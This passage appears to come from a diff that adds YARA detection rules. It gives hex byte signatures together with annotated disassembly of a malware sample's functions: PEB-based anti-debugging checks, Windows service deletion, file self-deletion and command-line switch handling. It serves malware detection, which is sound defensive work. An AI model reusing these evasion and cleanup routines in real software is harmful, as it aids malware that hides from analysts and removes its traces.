XREFS] + .text:0x00403281 6814c14000 push 0x0040c114 + .text:0x00403286 6810c14000 push 0x0040c110 + .text:0x0040328b 68e8c04000 push 0x0040c0e8 + .text:0x00403290 68e4c04000 push 0x0040c0e4 + .text:0x00403295 e836dfffff call 0x004011d0 ;sub_004011d0(0x0040c0e4,0x0040c0e8,0x0040c110,0x0040c114) + .text:0x0040329a 83c410 add esp,16 + .text:0x0040329d 85c0 test eax,eax + .text:0x0040329f 7407 jz 0x004032a8 + .text:0x004032a1 b801000000 mov eax,1 + .text:0x004032a6 eb02 jmp 0x004032aa + .text:0x004032a8 loc_004032a8: [1 XREFS] + .text:0x004032a8 33c0 xor eax,eax + .text:0x004032aa loc_004032aa: [9 XREFS] + .text:0x004032aa 5f pop edi + .text:0x004032ab 5e pop esi + .text:0x004032ac 5b pop ebx + .text:0x004032ad 8be5 mov esp,ebp + .text:0x004032af 5d pop ebp + .text:0x004032b0 c3 ret + */ + $c43 = { 55 8B EC B8 14 14 00 00 E8 ?? ?? ?? ?? 53 56 57 C7 85 ?? ?? ?? ?? 00 00 00 00 C7 85 ?? ?? ?? ?? 00 00 00 00 64 A1 ?? ?? ?? ?? 8A 58 ?? 88 9D ?? ?? ?? ?? 0F BE 85 ?? ?? ?? ?? 85 C0 74 ?? E8 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 8B 40 ?? 3E 8B 40 ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? 00 74 ?? E8 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 3E 8B 40 ?? 83 E8 70 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? 00 75 ?? E8 ?? ?? ?? ?? 68 00 04 00 00 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 08 85 C0 74 ?? B8 01 00 00 00 E9 ?? ?? ?? ?? BF 34 C1 40 00 8D 95 ?? ?? ?? ?? 83 C9 FF 33 C0 F2 AE F7 D1 2B F9 8B F7 8B C1 8B FA C1 E9 02 F3 A5 8B C8 83 E1 03 F3 A4 8D BD ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 83 C9 FF 33 C0 F2 AE F7 D1 2B F9 8B F7 8B D9 8B FA 83 C9 FF 33 C0 F2 AE 83 C7 FF 8B CB C1 E9 02 F3 A5 8B CB 83 E1 03 F3 A4 BF 2C C1 40 00 8D 95 ?? ?? ?? ?? 83 C9 FF 33 C0 F2 AE F7 D1 2B F9 8B F7 8B D9 8B FA 83 C9 FF 33 C0 F2 AE 83 C7 FF 8B CB C1 E9 02 F3 A5 8B CB 83 E1 03 F3 A4 68 3F 00 0F 00 6A 00 6A 00 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? 00 75 ?? B8 01 00 00 00 E9 ?? ?? ?? ?? 68 FF 01 0F 00 8B 45 ?? 50 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? 00 74 ?? 6A 00 6A 00 6A 00 6A 00 6A 00 6A 00 8D 95 ?? ?? ?? ?? 52 6A FF 6A 02 6A FF 8B 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? B8 01 00 00 00 E9 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 7D ?? 8D 95 ?? ?? ?? ?? 83 C9 FF 33 C0 F2 AE F7 D1 2B F9 8B F7 8B C1 8B FA C1 E9 02 F3 A5 8B C8 83 E1 03 F3 A4 BF 18 C1 40 00 8D 95 ?? ?? ?? ?? 83 C9 FF 33 C0 F2 AE F7 D1 2B F9 8B F7 8B D9 8B FA 83 C9 FF 33 C0 F2 AE 83 C7 FF 8B CB C1 E9 02 F3 A5 8B CB 83 E1 03 F3 A4 6A 00 6A 00 6A 00 6A 00 6A 00 8D 85 ?? ?? ?? ?? 50 6A 01 6A 02 6A 20 68 FF 01 0F 00 8D 8D ?? ?? ?? ?? 51 8B 55 ?? 52 8B 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? 00 75 ?? 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? B8 01 00 00 00 E9 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 68 00 04 00 00 8D 8D ?? ?? ?? ?? 51 8D 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 85 C0 75 ?? B8 01 00 00 00 E9 ?? ?? ?? ?? 68 00 04 00 00 8D 85 ?? ?? ?? ?? 50 6A 00 FF 15 ?? ?? ?? ?? 85 C0 75 ?? B8 01 00 00 00 EB ?? 6A 00 8D 8D ?? ?? ?? ?? 51 8D 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 85 C0 75 ?? B8 01 00 00 00 EB ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 04 85 C0 74 ?? B8 01 00 00 00 EB ?? 68 14 C1 40 00 68 10 C1 40 00 68 E8 C0 40 00 68 E4 C0 40 00 E8 ?? ?? ?? ?? 83 C4 10 85 C0 74 ?? B8 01 00 00 00 EB ?? 33 C0 5F 5E 5B 8B E5 5D C3 } + /* +function at 0x004032c0@7faafc7e4a5c736ebfee6abbbc812d80 with 4 features: + - check for PEB NtGlobalFlag flag + - delete file + - delete service + - query environment variable + .text:0x004032c0 + .text:0x004032c0 FUNC: int cdecl sub_004032c0( int arg0, ) [4 XREFS] + .text:0x004032c0 + .text:0x004032c0 Stack Variables: (offset from initial top of stack) + .text:0x004032c0 4: int arg0 + .text:0x004032c0 -1028: int local1028 + .text:0x004032c0 -1032: int local1032 + .text:0x004032c0 -2056: int local2056 + .text:0x004032c0 -3080: int local3080 + .text:0x004032c0 -3084: int local3084 + .text:0x004032c0 -3088: int local3088 + .text:0x004032c0 -3092: int local3092 + .text:0x004032c0 -3096: int local3096 + .text:0x004032c0 + .text:0x004032c0 55 push ebp + .text:0x004032c1 8bec mov ebp,esp + .text:0x004032c3 81ec140c0000 sub esp,3092 + .text:0x004032c9 53 push ebx + .text:0x004032ca 56 push esi + .text:0x004032cb 57 push edi + .text:0x004032cc c785f0f3ffff0000 mov dword [ebp - 3088],0 + .text:0x004032d6 c785ecf3ffff0000 mov dword [ebp - 3092],0 + .text:0x004032e0 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x004032e6 8a5802 mov bl,byte [eax + 2] + .text:0x004032e9 889df4f3ffff mov byte [ebp - 3084],bl + .text:0x004032ef 0fbe85f4f3ffff movsx eax,byte [ebp - 3084] + .text:0x004032f6 85c0 test eax,eax + .text:0x004032f8 7405 jz 0x004032ff + .text:0x004032fa e801ddffff call 0x00401000 ;sub_00401000() + .text:0x004032ff loc_004032ff: [1 XREFS] + .text:0x004032ff 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x00403305 8b4018 mov eax,dword [eax + 24] + .text:0x00403308 3e8b4010 ds: mov eax,dword [eax + 16] + .text:0x0040330c 8985f0f3ffff mov dword [ebp - 3088],eax + .text:0x00403312 83bdf0f3ffff00 cmp dword [ebp - 3088],0 + .text:0x00403319 7405 jz 0x00403320 + .text:0x0040331b e8e0dcffff call 0x00401000 ;sub_00401000() + .text:0x00403320 loc_00403320: [1 XREFS] + .text:0x00403320 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x00403326 3e8b4068 ds: mov eax,dword [eax + 104] + .text:0x0040332a 83e870 sub eax,112 + .text:0x0040332d 8985ecf3ffff mov dword [ebp - 3092],eax + .text:0x00403333 83bdecf3ffff00 cmp dword [ebp - 3092],0 + .text:0x0040333a 7505 jnz 0x00403341 + .text:0x0040333c e8bfdcffff call 0x00401000 ;sub_00401000() + .text:0x00403341 loc_00403341: [1 XREFS] + .text:0x00403341 683f000f00 push 0x000f003f + .text:0x00403346 6a00 push 0 + .text:0x00403348 6a00 push 0 + .text:0x0040334a ff1500b04000 call dword [0x0040b000] ;advapi32.OpenSCManagerA(0,0,0x000f003f) + .text:0x00403350 8985fcfbffff mov dword [ebp - 1028],eax + .text:0x00403356 83bdfcfbffff00 cmp dword [ebp - 1028],0 + .text:0x0040335d 750a jnz 0x00403369 + .text:0x0040335f b801000000 mov eax,1 + .text:0x00403364 e9b3010000 jmp 0x0040351c + .text:0x00403369 loc_00403369: [1 XREFS] + .text:0x00403369 68ff010f00 push 0x000f01ff + .text:0x0040336e 8b4d08 mov ecx,dword [ebp + 8] + .text:0x00403371 51 push ecx + .text:0x00403372 8b95fcfbffff mov edx,dword [ebp - 1028] + .text:0x00403378 52 push edx + .text:0x00403379 ff1504b04000 call dword [0x0040b004] ;advapi32.OpenServiceA(advapi32.OpenSCManagerA(0,0,0x000f003f),arg0,0x000f01ff) + .text:0x0040337f 8985f8f3ffff mov dword [ebp - 3080],eax + .text:0x00403385 83bdf8f3ffff00 cmp dword [ebp - 3080],0 + .text:0x0040338c 7517 jnz 0x004033a5 + .text:0x0040338e 8b85fcfbffff mov eax,dword [ebp - 1028] + .text:0x00403394 50 push eax + .text:0x00403395 ff150cb04000 call dword [0x0040b00c] ;advapi32.CloseServiceHandle(<0x0040334a>) + .text:0x0040339b b801000000 mov eax,1 + .text:0x004033a0 e977010000 jmp 0x0040351c + .text:0x004033a5 loc_004033a5: [1 XREFS] + .text:0x004033a5 8b8df8f3ffff mov ecx,dword [ebp - 3080] + .text:0x004033ab 51 push ecx + .text:0x004033ac ff1528b04000 call dword [0x0040b028] ;advapi32.DeleteService(advapi32.OpenServiceA(<0x0040334a>,arg0,0x000f01ff)) + .text:0x004033b2 85c0 test eax,eax + .text:0x004033b4 7524 jnz 0x004033da + .text:0x004033b6 8b95fcfbffff mov edx,dword [ebp - 1028] + .text:0x004033bc 52 push edx + .text:0x004033bd ff150cb04000 call dword [0x0040b00c] ;advapi32.CloseServiceHandle(<0x0040334a>) + .text:0x004033c3 8b85f8f3ffff mov eax,dword [ebp - 3080] + .text:0x004033c9 50 push eax + .text:0x004033ca ff150cb04000 call dword [0x0040b00c] ;advapi32.CloseServiceHandle(<0x00403379>) + .text:0x004033d0 b801000000 mov eax,1 + .text:0x004033d5 e942010000 jmp 0x0040351c + .text:0x004033da loc_004033da: [1 XREFS] + .text:0x004033da 8b8dfcfbffff mov ecx,dword [ebp - 1028] + .text:0x004033e0 51 push ecx + .text:0x004033e1 ff150cb04000 call dword [0x0040b00c] ;advapi32.CloseServiceHandle(<0x0040334a>) + .text:0x004033e7 8b95f8f3ffff mov edx,dword [ebp - 3080] + .text:0x004033ed 52 push edx + .text:0x004033ee ff150cb04000 call dword [0x0040b00c] ;advapi32.CloseServiceHandle(<0x00403379>) + .text:0x004033f4 6800040000 push 1024 + .text:0x004033f9 8d85fcf3ffff lea eax,dword [ebp - 3076] + .text:0x004033ff 50 push eax + .text:0x00403400 e86bfaffff call 0x00402e70 ;sub_00402e70(local3080) + .text:0x00403405 83c408 add esp,8 + .text:0x00403408 85c0 test eax,eax + .text:0x0040340a 740a jz 0x00403416 + .text:0x0040340c b801000000 mov eax,1 + .text:0x00403411 e906010000 jmp 0x0040351c + .text:0x00403416 loc_00403416: [1 XREFS] + .text:0x00403416 bf34c14000 mov edi,0x0040c134 + .text:0x0040341b 8d9500fcffff lea edx,dword [ebp - 1024] + .text:0x00403421 83c9ff or ecx,0xffffffff + .text:0x00403424 33c0 xor eax,eax + .text:0x00403426 f2ae repnz: scasb + .text:0x00403428 f7d1 not ecx + .text:0x0040342a 2bf9 sub edi,ecx + .text:0x0040342c 8bf7 mov esi,edi + .text:0x0040342e 8bc1 mov eax,ecx + .text:0x00403430 8bfa mov edi,edx + .text:0x00403432 c1e902 shr ecx,2 + .text:0x00403435 f3a5 rep: movsd + .text:0x00403437 8bc8 mov ecx,eax + .text:0x00403439 83e103 and ecx,3 + .text:0x0040343c f3a4 rep: movsb + .text:0x0040343e 8dbdfcf3ffff lea edi,dword [ebp - 3076] + .text:0x00403444 8d9500fcffff lea edx,dword [ebp - 1024] + .text:0x0040344a 83c9ff or ecx,0xffffffff + .text:0x0040344d 33c0 xor eax,eax + .text:0x0040344f f2ae repnz: scasb + .text:0x00403451 f7d1 not ecx + .text:0x00403453 2bf9 sub edi,ecx + .text:0x00403455 8bf7 mov esi,edi + .text:0x00403457 8bd9 mov ebx,ecx + .text:0x00403459 8bfa mov edi,edx + .text:0x0040345b 83c9ff or ecx,0xffffffff + .text:0x0040345e 33c0 xor eax,eax + .text:0x00403460 f2ae repnz: scasb + .text:0x00403462 83c7ff add edi,0xffffffff + .text:0x00403465 8bcb mov ecx,ebx + .text:0x00403467 c1e902 shr ecx,2 + .text:0x0040346a f3a5 rep: movsd + .text:0x0040346c 8bcb mov ecx,ebx + .text:0x0040346e 83e103 and ecx,3 + .text:0x00403471 f3a4 rep: movsb + .text:0x00403473 bf2cc14000 mov edi,0x0040c12c + .text:0x00403478 8d9500fcffff lea edx,dword [ebp - 1024] + .text:0x0040347e 83c9ff or ecx,0xffffffff + .text:0x00403481 33c0 xor eax,eax + .text:0x00403483 f2ae repnz: scasb + .text:0x00403485 f7d1 not ecx + .text:0x00403487 2bf9 sub edi,ecx + .text:0x00403489 8bf7 mov esi,edi + .text:0x0040348b 8bd9 mov ebx,ecx + .text:0x0040348d 8bfa mov edi,edx + .text:0x0040348f 83c9ff or ecx,0xffffffff + .text:0x00403492 33c0 xor eax,eax + .text:0x00403494 f2ae repnz: scasb + .text:0x00403496 83c7ff add edi,0xffffffff + .text:0x00403499 8bcb mov ecx,ebx + .text:0x0040349b c1e902 shr ecx,2 + .text:0x0040349e f3a5 rep: movsd + .text:0x004034a0 8bcb mov ecx,ebx + .text:0x004034a2 83e103 and ecx,3 + .text:0x004034a5 f3a4 rep: movsb + .text:0x004034a7 6800040000 push 1024 + .text:0x004034ac 8d85fcf7ffff lea eax,dword [ebp - 2052] + .text:0x004034b2 50 push eax + .text:0x004034b3 8d8d00fcffff lea ecx,dword [ebp - 1024] + .text:0x004034b9 51 push ecx + .text:0x004034ba ff1530b04000 call dword [0x0040b030] ;kernel32.ExpandEnvironmentStringsA(local1028,local2056,1024) + .text:0x004034c0 85c0 test eax,eax + .text:0x004034c2 7507 jnz 0x004034cb + .text:0x004034c4 b801000000 mov eax,1 + .text:0x004034c9 eb51 jmp 0x0040351c + .text:0x004034cb loc_004034cb: [1 XREFS] + .text:0x004034cb 8d95fcf7ffff lea edx,dword [ebp - 2052] + .text:0x004034d1 52 push edx + .text:0x004034d2 ff1560b04000 call dword [0x0040b060] ;kernel32.DeleteFileA(local2056) + .text:0x004034d8 85c0 test eax,eax + .text:0x004034da 7507 jnz 0x004034e3 + .text:0x004034dc b801000000 mov eax,1 + .text:0x004034e1 eb39 jmp 0x0040351c + .text:0x004034e3 loc_004034e3: [1 XREFS] + .text:0x004034e3 6860eb4000 push 0x0040eb60 + .text:0x004034e8 6860eb4000 push 0x0040eb60 + .text:0x004034ed 6860eb4000 push 0x0040eb60 + .text:0x004034f2 6860eb4000 push 0x0040eb60 + .text:0x004034f7 e8d4dcffff call 0x004011d0 ;sub_004011d0(0x0040eb60,0x0040eb60,0x0040eb60,0x0040eb60) + .text:0x004034fc 83c410 add esp,16 + .text:0x004034ff 85c0 test eax,eax + .text:0x00403501 7407 jz 0x0040350a + .text:0x00403503 b801000000 mov eax,1 + .text:0x00403508 eb12 jmp 0x0040351c + .text:0x0040350a loc_0040350a: [1 XREFS] + .text:0x0040350a e8d1deffff call 0x004013e0 ;sub_004013e0() + .text:0x0040350f 85c0 test eax,eax + .text:0x00403511 7407 jz 0x0040351a + .text:0x00403513 b801000000 mov eax,1 + .text:0x00403518 eb02 jmp 0x0040351c + .text:0x0040351a loc_0040351a: [1 XREFS] + .text:0x0040351a 33c0 xor eax,eax + .text:0x0040351c loc_0040351c: [8 XREFS] + .text:0x0040351c 5f pop edi + .text:0x0040351d 5e pop esi + .text:0x0040351e 5b pop ebx + .text:0x0040351f 8be5 mov esp,ebp + .text:0x00403521 5d pop ebp + .text:0x00403522 c3 ret + */ + $c44 = { 55 8B EC 81 EC 14 0C 00 00 53 56 57 C7 85 ?? ?? ?? ?? 00 00 00 00 C7 85 ?? ?? ?? ?? 00 00 00 00 64 A1 ?? ?? ?? ?? 8A 58 ?? 88 9D ?? ?? ?? ?? 0F BE 85 ?? ?? ?? ?? 85 C0 74 ?? E8 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 8B 40 ?? 3E 8B 40 ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? 00 74 ?? E8 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 3E 8B 40 ?? 83 E8 70 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? 00 75 ?? E8 ?? ?? ?? ?? 68 3F 00 0F 00 6A 00 6A 00 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? 00 75 ?? B8 01 00 00 00 E9 ?? ?? ?? ?? 68 FF 01 0F 00 8B 4D ?? 51 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? 00 75 ?? 8B 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? B8 01 00 00 00 E9 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? B8 01 00 00 00 E9 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 68 00 04 00 00 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 08 85 C0 74 ?? B8 01 00 00 00 E9 ?? ?? ?? ?? BF 34 C1 40 00 8D 95 ?? ?? ?? ?? 83 C9 FF 33 C0 F2 AE F7 D1 2B F9 8B F7 8B C1 8B FA C1 E9 02 F3 A5 8B C8 83 E1 03 F3 A4 8D BD ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 83 C9 FF 33 C0 F2 AE F7 D1 2B F9 8B F7 8B D9 8B FA 83 C9 FF 33 C0 F2 AE 83 C7 FF 8B CB C1 E9 02 F3 A5 8B CB 83 E1 03 F3 A4 BF 2C C1 40 00 8D 95 ?? ?? ?? ?? 83 C9 FF 33 C0 F2 AE F7 D1 2B F9 8B F7 8B D9 8B FA 83 C9 FF 33 C0 F2 AE 83 C7 FF 8B CB C1 E9 02 F3 A5 8B CB 83 E1 03 F3 A4 68 00 04 00 00 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 85 C0 75 ?? B8 01 00 00 00 EB ?? 8D 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 85 C0 75 ?? B8 01 00 00 00 EB ?? 68 60 EB 40 00 68 60 EB 40 00 68 60 EB 40 00 68 60 EB 40 00 E8 ?? ?? ?? ?? 83 C4 10 85 C0 74 ?? B8 01 00 00 00 EB ?? E8 ?? ?? ?? ?? 85 C0 74 ?? B8 01 00 00 00 EB ?? 33 C0 5F 5E 5B 8B E5 5D C3 } + /* +function at 0x00403530@7faafc7e4a5c736ebfee6abbbc812d80 with 1 features: + - check for PEB NtGlobalFlag flag + .text:0x00403530 + .text:0x00403530 FUNC: int cdecl sub_00403530( int arg0, int arg1, ) [2 XREFS] + .text:0x00403530 + .text:0x00403530 Stack Variables: (offset from initial top of stack) + .text:0x00403530 8: int arg1 + .text:0x00403530 4: int arg0 + .text:0x00403530 -8: int local8 + .text:0x00403530 -1032: int local1032 + .text:0x00403530 -1036: int local1036 + .text:0x00403530 -2060: int local2060 + .text:0x00403530 -2064: int local2064 + .text:0x00403530 -2068: int local2068 + .text:0x00403530 -2072: int local2072 + .text:0x00403530 -2076: int local2076 + .text:0x00403530 -2080: int local2080 + .text:0x00403530 -3104: int local3104 + .text:0x00403530 -4128: int local4128 + .text:0x00403530 -5152: int local5152 + .text:0x00403530 -6176: int local6176 + .text:0x00403530 -6180: int local6180 + .text:0x00403530 -6184: int local6184 + .text:0x00403530 -6188: int local6188 + .text:0x00403530 -6192: int local6192 + .text:0x00403530 -6196: int local6196 + .text:0x00403530 -6200: int local6200 + .text:0x00403530 -6204: int local6204 + .text:0x00403530 + .text:0x00403530 55 push ebp + .text:0x00403531 8bec mov ebp,esp + .text:0x00403533 b838180000 mov eax,0x00001838 + .text:0x00403538 e833040000 call 0x00403970 ;__alloca_probe() + .text:0x0040353d 53 push ebx + .text:0x0040353e 56 push esi + .text:0x0040353f 57 push edi + .text:0x00403540 c785dce7ffff0000 mov dword [ebp - 6180],0 + .text:0x0040354a c785d8e7ffff0000 mov dword [ebp - 6184],0 + .text:0x00403554 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x0040355a 8a5802 mov bl,byte [eax + 2] + .text:0x0040355d 889de0e7ffff mov byte [ebp - 6176],bl + .text:0x00403563 0fbe85e0e7ffff movsx eax,byte [ebp - 6176] + .text:0x0040356a 85c0 test eax,eax + .text:0x0040356c 7405 jz 0x00403573 + .text:0x0040356e e88ddaffff call 0x00401000 ;sub_00401000() + .text:0x00403573 loc_00403573: [1 XREFS] + .text:0x00403573 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x00403579 8b4018 mov eax,dword [eax + 24] + .text:0x0040357c 3e8b4010 ds: mov eax,dword [eax + 16] + .text:0x00403580 8985dce7ffff mov dword [ebp - 6180],eax + .text:0x00403586 83bddce7ffff00 cmp dword [ebp - 6180],0 + .text:0x0040358d 7405 jz 0x00403594 + .text:0x0040358f e86cdaffff call 0x00401000 ;sub_00401000() + .text:0x00403594 loc_00403594: [1 XREFS] + .text:0x00403594 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x0040359a 3e8b4068 ds: mov eax,dword [eax + 104] + .text:0x0040359e 83e870 sub eax,112 + .text:0x004035a1 8985d8e7ffff mov dword [ebp - 6184],eax + .text:0x004035a7 83bdd8e7ffff00 cmp dword [ebp - 6184],0 + .text:0x004035ae 7505 jnz 0x004035b5 + .text:0x004035b0 e84bdaffff call 0x00401000 ;sub_00401000() + .text:0x004035b5 loc_004035b5: [1 XREFS] + .text:0x004035b5 837d0801 cmp dword [ebp + 8],1 + .text:0x004035b9 751a jnz 0x004035d5 + .text:0x004035bb e840dbffff call 0x00401100 ;sub_00401100() + .text:0x004035c0 85c0 test eax,eax + .text:0x004035c2 7407 jz 0x004035cb + .text:0x004035c4 e877f6ffff call 0x00402c40 ;sub_00402c40() + .text:0x004035c9 eb05 jmp 0x004035d0 + .text:0x004035cb loc_004035cb: [1 XREFS] + .text:0x004035cb e830daffff call 0x00401000 ;sub_00401000() + .text:0x004035d0 loc_004035d0: [1 XREFS] + .text:0x004035d0 e959020000 jmp 0x0040382e + .text:0x004035d5 loc_004035d5: [1 XREFS] + .text:0x004035d5 8b4d08 mov ecx,dword [ebp + 8] + .text:0x004035d8 8b550c mov edx,dword [ebp + 12] + .text:0x004035db 8b448afc mov eax,dword [edx + ecx * 4 + -4] + .text:0x004035df 8945fc mov dword [ebp - 4],eax + .text:0x004035e2 8b4dfc mov ecx,dword [ebp - 4] + .text:0x004035e5 51 push ecx + .text:0x004035e6 e885f7ffff call 0x00402d70 ;sub_00402d70(0x61616161) + .text:0x004035eb 83c404 add esp,4 + .text:0x004035ee 85c0 test eax,eax + .text:0x004035f0 7505 jnz 0x004035f7 + .text:0x004035f2 e809daffff call 0x00401000 ;sub_00401000() + .text:0x004035f7 loc_004035f7: [1 XREFS] + .text:0x004035f7 8b550c mov edx,dword [ebp + 12] + .text:0x004035fa 8b4204 mov eax,dword [edx + 4] + .text:0x004035fd 8985d4e7ffff mov dword [ebp - 6188],eax + .text:0x00403603 6870c14000 push 0x0040c170 + .text:0x00403608 8b8dd4e7ffff mov ecx,dword [ebp - 6188] + .text:0x0040360e 51 push ecx + .text:0x0040360f e8bb0c0000 call 0x004042cf ;__mbscmp(0x61616161,arg1,0x61616161) + .text:0x00403614 83c408 add esp,8 + .text:0x00403617 85c0 test eax,eax + .text:0x00403619 7564 jnz 0x0040367f + .text:0x0040361b 837d0803 cmp dword [ebp + 8],3 + .text:0x0040361f 7531 jnz 0x00403652 + .text:0x00403621 6800040000 push 1024 + .text:0x00403626 8d95fcfbffff lea edx,dword [ebp - 1028] + .text:0x0040362c 52 push edx + .text:0x0040362d e83ef8ffff call 0x00402e70 ;sub_00402e70(local1032) + .text:0x00403632 83c408 add esp,8 + .text:0x00403635 85c0 test eax,eax + .text:0x00403637 7408 jz 0x00403641 + .text:0x00403639 83c8ff or eax,0xffffffff + .text:0x0040363c e9ef010000 jmp 0x00403830 + .text:0x00403641 loc_00403641: [1 XREFS] + .text:0x00403641 8d85fcfbffff lea eax,dword [ebp - 1028] + .text:0x00403647 50 push eax + .text:0x00403648 e8f3f8ffff call 0x00402f40 ;sub_00402f40(local1032) + .text:0x0040364d 83c404 add esp,4 + .text:0x00403650 eb28 jmp 0x0040367a + .text:0x00403652 loc_00403652: [1 XREFS] + .text:0x00403652 837d0804 cmp dword [ebp + 8],4 + .text:0x00403656 751d jnz 0x00403675 + .text:0x00403658 8b4d0c mov ecx,dword [ebp + 12] + .text:0x0040365b 8b5108 mov edx,dword [ecx + 8] + .text:0x0040365e 8995f8fbffff mov dword [ebp - 1032],edx + .text:0x00403664 8b85f8fbffff mov eax,dword [ebp - 1032] + .text:0x0040366a 50 push eax + .text:0x0040366b e8d0f8ffff call 0x00402f40 ;sub_00402f40(0x61616161) + .text:0x00403670 83c404 add esp,4 + .text:0x00403673 eb05 jmp 0x0040367a + .text:0x00403675 loc_00403675: [1 XREFS] + .text:0x00403675 e886d9ffff call 0x00401000 ;sub_00401000() + .text:0x0040367a loc_0040367a: [2 XREFS] + .text:0x0040367a e9af010000 jmp 0x0040382e + .text:0x0040367f loc_0040367f: [1 XREFS] + .text:0x0040367f 8b4d0c mov ecx,dword [ebp + 12] + .text:0x00403682 8b5104 mov edx,dword [ecx + 4] + .text:0x00403685 8995d0e7ffff mov dword [ebp - 6192],edx + .text:0x0040368b 686cc14000 push 0x0040c16c + .text:0x00403690 8b85d0e7ffff mov eax,dword [ebp - 6192] + .text:0x00403696 50 push eax + .text:0x00403697 e8330c0000 call 0x004042cf ;__mbscmp(0x61616161,0x61616161,arg1) + .text:0x0040369c 83c408 add esp,8 + .text:0x0040369f 85c0 test eax,eax + .text:0x004036a1 7564 jnz 0x00403707 + .text:0x004036a3 837d0803 cmp dword [ebp + 8],3 + .text:0x004036a7 7531 jnz 0x004036da + .text:0x004036a9 6800040000 push 1024 + .text:0x004036ae 8d8df8f7ffff lea ecx,dword [ebp - 2056] + .text:0x004036b4 51 push ecx + .text:0x004036b5 e8b6f7ffff call 0x00402e70 ;sub_00402e70(local2060) + .text:0x004036ba 83c408 add esp,8 + .text:0x004036bd 85c0 test eax,eax + .text:0x004036bf 7408 jz 0x004036c9 + .text:0x004036c1 83c8ff or eax,0xffffffff + .text:0x004036c4 e967010000 jmp 0x00403830 + .text:0x004036c9 loc_004036c9: [1 XREFS] + .text:0x004036c9 8d95f8f7ffff lea edx,dword [ebp - 2056] + .text:0x004036cf 52 push edx + .text:0x004036d0 e8ebfbffff call 0x004032c0 ;sub_004032c0(local2060) + .text:0x004036d5 83c404 add esp,4 + .text:0x004036d8 eb28 jmp 0x00403702 + .text:0x004036da loc_004036da: [1 XREFS] + .text:0x004036da 837d0804 cmp dword [ebp + 8],4 + .text:0x004036de 751d jnz 0x004036fd + .text:0x004036e0 8b450c mov eax,dword [ebp + 12] + .text:0x004036e3 8b4808 mov ecx,dword [eax + 8] + .text:0x004036e6 898df4f7ffff mov dword [ebp - 2060],ecx + .text:0x004036ec 8b95f4f7ffff mov edx,dword [ebp - 2060] + .text:0x004036f2 52 push edx + .text:0x004036f3 e8c8fbffff call 0x004032c0 ;sub_004032c0(0x61616161) + .text:0x004036f8 83c404 add esp,4 + .text:0x004036fb eb05 jmp 0x00403702 + .text:0x004036fd loc_004036fd: [1 XREFS] + .text:0x004036fd e8fed8ffff call 0x00401000 ;sub_00401000() + .text:0x00403702 loc_00403702: [2 XREFS] + .text:0x00403702 e927010000 jmp 0x0040382e + .text:0x00403707 loc_00403707: [1 XREFS] + .text:0x00403707 8b450c mov eax,dword [ebp + 12] + .text:0x0040370a 8b4804 mov ecx,dword [eax + 4] + .text:0x0040370d 898dcce7ffff mov dword [ebp - 6196],ecx + .text:0x00403713 6868c14000 push 0x0040c168 + .text:0x00403718 8b95cce7ffff mov edx,dword [ebp - 6196] + .text:0x0040371e 52 push edx + .text:0x0040371f e8ab0b0000 call 0x004042cf ;__mbscmp(arg1,0x61616161,0x61616161) + .text:0x00403724 83c408 add esp,8 + .text:0x00403727 85c0 test eax,eax + .text:0x00403729 7566 jnz 0x00403791 + .text:0x0040372b 837d0807 cmp dword [ebp + 8],7 + .text:0x0040372f 7556 jnz 0x00403787 + .text:0x00403731 8b450c mov eax,dword [ebp + 12] + .text:0x00403734 8b4808 mov ecx,dword [eax + 8] + 